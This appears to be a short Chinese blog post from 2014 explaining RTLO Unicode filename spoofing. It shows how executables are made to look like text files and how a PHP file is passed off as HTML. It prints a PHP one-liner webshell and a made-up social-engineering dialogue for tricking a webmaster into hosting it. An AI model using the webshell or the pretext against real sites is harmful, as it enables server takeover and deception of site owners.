浅谈RTLO技术

2014-09-09

我在FreeBuf上到了 [APT攻击]趋势科技捕获一次APT攻击活动这篇文章，然后就自己去探探究竟，文章地址在下面

传送门

RLO控制符是Unicode控制符的一种，使得字符显示从右至左的顺序，攻击者可以利用RTLO技术来达到欺骗目标，从而使得可执行文件的运行

首先Windows系统在解析文件名时，当遇到unicode控制符时，会改变文件名的显示方式，利用这一特性，可以将exe、scr、com等可执行文件伪装成doc、jpg、txt、ppt等

例如：我首先创建一个bat文件，命名为txt.bat，里面内容写为ping baidu.com，下面就是重点了，我们进行重命名，选择“插入unicode控制字符”，然后就到了这个菜单栏，我们选择RLO，输入txt.bat
<ignore_js_op> <ignore_js_op>

我们可以看到此时文件名已经显示为tab.txt
<ignore_js_op> <ignore_js_op>

不过我们看到它是一个window批处理文件(bat)，可以正常执行指令

当然文件的图标方面也是可以修改的，这样可以显得文件的确是一个txt文档，从而诱使目标打开，增加成功几率

简单的一笔

给自己做个记录

科学研究话题：HTML文件是否可以变为WEBSHELL

测试环境：Linux+Apache+Php
Linux+Nginx+Php

<ignore_js_op>
<ignore_js_op>

从上面2幅图可以看到HTML是没有办法充当一句话的，但是现在我们需要的就是把HTML变为PHP文件，这个可能实现吗？完全有可能！！！这里需要运用到RTLO技术，来进行欺骗，我个人认为目前这种方法适用于社会工程学攻击方面比较得体。

<ignore_js_op>

可以看到运用RTLO技术，我们已经把html.php变为了php.html，这样我们可以用于欺骗。如何欺骗？下面是虚构的一篇对话！当然方法不唯一！

===>攻击者事先把恶意代码放入HTML中(<?php @eval($_POST['sys']);?>)
→攻击者：你是xxx的站长吗？我有一个小广告想挂在你的网站上面。
→站长：嗯，你好，我是xxx的站长。
→攻击者：站长，是这样的，我想先把一个HTML放进去，看看效果，如果效果不错，就可以付款，然后正式开始合作。
→站长：嗯，行，那你把HTML文件传过来吧。
→站长： www.xxx.com/php.html，你看看去吧，如果效果不错，我就去放置了。

其实这个时候php.html文件早以不存在了，而在linux下面它会这样显示?lmth.php，这样它就变为了一个可执行文件php，从而攻击者可以获取到webshell。
为了还原现场，我把已经运用RTLO技术的php.html上传到服务器，由于linux没有unicode控制符这么一说，所以linux会还原为lmth.php(这个为windows下运用RTLO输入时的场景)

<ignore_js_op>

攻击者从而就可以获取到webshell了，www.xxx.com/%3flmth.php。

<ignore_js_op>